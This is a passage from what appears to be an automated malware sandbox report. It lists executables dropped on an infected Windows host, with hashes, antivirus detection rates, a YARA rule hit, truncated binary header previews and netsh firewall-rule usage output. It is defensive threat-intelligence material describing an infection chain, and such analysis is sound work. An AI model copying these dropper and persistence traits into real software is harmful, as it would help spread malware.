                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\54AF.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:MS-DOS executable
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):557664
                                                                                                                      Entropy (8bit):7.687250283474463
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                      MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                      SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                      SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                      SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                      C:\Users\user\AppData\Local\Temp\6AF7.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7336385
                                                                                                                      Entropy (8bit):7.993036026488077
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                                      MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                                      SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                                      SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                                      SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\7808.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3590144
                                                                                                                      Entropy (8bit):7.997643531968
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                                      MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                                      SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                                      SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                                      SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\8017.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):5.021094695416705
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                                      MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                                      SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                                      SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                                      SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\8017.exe, Author: Florian Roth
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                                      C:\Users\user\AppData\Local\Temp\88E2.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1474560
                                                                                                                      Entropy (8bit):6.247221725855881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:EhiK5YeyX+krf/WDW7lhw/Re3/gXfoGmxXS+TaeSmOsS6SVHdYPQLnfnqG6JJzTm:v4jyX+krf/WDW7lhw/Re3/gXfoGmxXSt
                                                                                                                      MD5:8C7457EEF295583195EF22683C133923
                                                                                                                      SHA1:DD03B6C66BDAFDFC9DDFA468072D0D2C7AE97733
                                                                                                                      SHA-256:E45E273ADB510E4D06F8D10B121740CDFABD862EA7D5617BCCE4BC9D81485939
                                                                                                                      SHA-512:6437E6C0F4E36110B2614CFAE192AF5F18654D83478DBC4807DF42112A5E407150E9EEDF652E29E20EABFCD169657C40B64E660E344C392CB61D8C492FD07DC8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[(h...............0..v.............. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B........................H.......4...P.......+N...`..tg..................................................g.......y....(.O..*.s+I...b...**....(i...*f....(j...r...p(....(k...*f....ol...(m...ol...on...*.s.N.......*f....ol...r.'.p(....on...*f....o....rc'.p(....on...*f....o....r.'.p(....(k...*.....o....r/(.p(....r/!.p(....rq!.p(....(....on...*f....o....r.(.p(....(k...*f....o....r.(.p(....(k...*f....o....r.).p(....(k...*f....o....r.).p(....(k...*.~....:#...r;*.p(.....#...(....o....s.........~....*.~....*.~
                                                                                                                      C:\Users\user\AppData\Local\Temp\9789.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3602944
                                                                                                                      Entropy (8bit):7.997581797791447
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:98304:dUo6hIZwh7VTBNLQP/zCAtY5oujwp+sTEo2fSTUD1R:dUPhIZwhBzQD1GoufsbTUDT
                                                                                                                      MD5:E13718B977E0A61DEFA3A5313E1FBED6
                                                                                                                      SHA1:F70F1A541102F74517050D9731898592386196F4
                                                                                                                      SHA-256:2B13A7CCA8C39A41F4E760F432948D1E16DC75444B28FFAD71042F5817926AAE
                                                                                                                      SHA-512:2034240C486D46A8EC52C85892ACEEA2B9ABF6E5199AFD33FDB4AE6FE12FFA480006B0F93B5BF6CFB6AD9C1B5A58DFFDD26D05E4BAA7095948D7686ABFC040FC
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......O7.....................................|.O. ....pM...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1......./.................@....rsrc........pM.......0.............@....wZtCyLX......O......J2.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):301056
                                                                                                                      Entropy (8bit):5.192330972647351
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                      MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                      SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                      SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                      SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321024
                                                                                                                      Entropy (8bit):6.6910111765717115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
                                                                                                                      MD5:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      SHA1:5362AF084622DC8EFC661C703D4C7C5DD6839BE1
                                                                                                                      SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
                                                                                                                      SHA-512:F16FDD7212BC64F05EF67B41E29DD8966645B7FA0E7D78E8883503503A3589A090C54846500925F17B8DD1D133E1F5BB37BBDE16F3E5C50864847C17F7DF2C06
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_.........................................@.................................1...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zafif..............................@....naladin............................@....ger................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\FC2A.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):905216
                                                                                                                      Entropy (8bit):7.399713113456654
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                      MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                      SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                      SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                      SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13666304
                                                                                                                      Entropy (8bit):3.7861536709741657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:4vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:KrN0vR36TBHLY1JSWMQAt
                                                                                                                      MD5:5C50CF4AF77D12BF94B3FC09437C8B16
                                                                                                                      SHA1:C3D531F3C72F96EFCB00F932E744859755E88E54
                                                                                                                      SHA-256:43EF54A754F54F17F38D5D6AC207B1EF17953FD742A18124CCD2423E7E01B6F8
                                                                                                                      SHA-512:592FA7679DE8F8673287088C175EA7EB4D035B589F71C060F0151BF37FA4B55C13A96B8B214F26538768C1F64B891A9E5B7DFBF7481274F327C8CBC31518B296
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321024
                                                                                                                      Entropy (8bit):6.6910111765717115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
                                                                                                                      MD5:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      SHA1:5362AF084622DC8EFC661C703D4C7C5DD6839BE1
                                                                                                                      SHA-256:0245C82558329CFD8EF5EF901E4929075D4D873BA20D9704731758580CAED7BE
                                                                                                                      SHA-512:F16FDD7212BC64F05EF67B41E29DD8966645B7FA0E7D78E8883503503A3589A090C54846500925F17B8DD1D133E1F5BB37BBDE16F3E5C50864847C17F7DF2C06
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_.........................................@.................................1...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zafif..............................@....naladin............................@....ger................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\vfgiwcs:Zone.Identifier
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                      C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_050436_607.etl
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8192
                                                                                                                      Entropy (8bit):3.375971674018937
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:VC5Hf/o+Wco5dyE9P/YsZACXxFI2lQGgkhnp4vezT2AjFzONMCidJRRj5N:M98Hpg2wuPCCP
                                                                                                                      MD5:8306EA709D3745A390765D410EC31DAE
                                                                                                                      SHA1:936DBE90F785ED33F45FC201D7BC814E11F5308F
                                                                                                                      SHA-256:1A86E818169EEE39C19C4CF088EE777782FC15A652CF287228B748F4284CA90A
                                                                                                                      SHA-512:59D2CBB5C9474B7E46D1A590DD67BFAB68A7CBBDA7B966EAF00A10A121E50F97C655088108B74EB357685E99E347243B4A8905A224423279B5E9710F8C145CCC
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: .... ... ....................................... ...!...............................(............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....0.~d............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.5.0.4.3.6._.6.0.7...e.t.l.........P.P.....(...........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe (copy)
                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13666304
                                                                                                                      Entropy (8bit):3.7861536709741657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:4vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:KrN0vR36TBHLY1JSWMQAt
                                                                                                                      MD5:5C50CF4AF77D12BF94B3FC09437C8B16
                                                                                                                      SHA1:C3D531F3C72F96EFCB00F932E744859755E88E54
                                                                                                                      SHA-256:43EF54A754F54F17F38D5D6AC207B1EF17953FD742A18124CCD2423E7E01B6F8
                                                                                                                      SHA-512:592FA7679DE8F8673287088C175EA7EB4D035B589F71C060F0151BF37FA4B55C13A96B8B214F26538768C1F64B891A9E5B7DFBF7481274F327C8CBC31518B296
                                                                                                                      Malicious:true
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1572864
                                                                                                                      Entropy (8bit):4.262263551383356
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:73ZKSZjdY1Nuot+yrYLwOFZcgSiIb7uMCTi3xzM2gdGX+oNU6iD+EVEV:7ZKSZjdY1Nuot+ybcY9V
                                                                                                                      MD5:BFF50EE8D271FF908B21241B2424A1E1
                                                                                                                      SHA1:67996C2F184A7B329E2C68781E7E354EB781D2FA
                                                                                                                      SHA-256:2881D8D250821B2B44ECA36D4FCAF909B998042A74FDBA62CEC164AFDCA8AE1E
                                                                                                                      SHA-512:72EA7560877C003AA5AF36379C5453EB6A18C6F30C67039B98EF38E2D98E980DC0E1A0F32D6035E31E454E707CC194DB77052E1CF5F55C319295381DB7B600BE
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.*x..................................................................................................................................................................................................................................................................................................................................................!%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24576
                                                                                                                      Entropy (8bit):3.7779067348278756
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:AkQAO25/ZrdtdXp55Qp8cXQnxOf2onPmxwpa5GjZmGhODTTV85N5i9zwbCeT:PPBr5XpEpQgf2o+xwpGWmGh0TVoN5kzE
                                                                                                                      MD5:953434AD47F5C2003B186C7B2E817D4F
                                                                                                                      SHA1:8568DEEB4E58E4CA8B05A9A8F870BC26F185A58A
                                                                                                                      SHA-256:ABB8237331BB32B29B72BC2DB4133432D9C4B42C16ACB4D87D26B3DC4DB08E37
                                                                                                                      SHA-512:03F8F26709DA5A97B466E784B96CC67F86B1D875CDCFDD558010CDFF168C42534F726059AC2FAC036F2789A931B59FFE8B95FDE2A2D7E83116ECBB4461930EE9
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.*x..................................................................................................................................................................................................................................................................................................................................................!%HvLE.^......P............}vp8.EJ.W!I.).Q............................. ..hbin................p.\..,..........nk,.s.*x.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .s.*x........ ...........P............... .......Z.......................Root........lf......Root....nk .s.*x.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                                                      \Device\ConDrv
                                                                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3773
                                                                                                                      Entropy (8bit):4.7109073551842435
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                      MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                      SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                      SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                      SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                      Static File Info

                                                                                                                      General

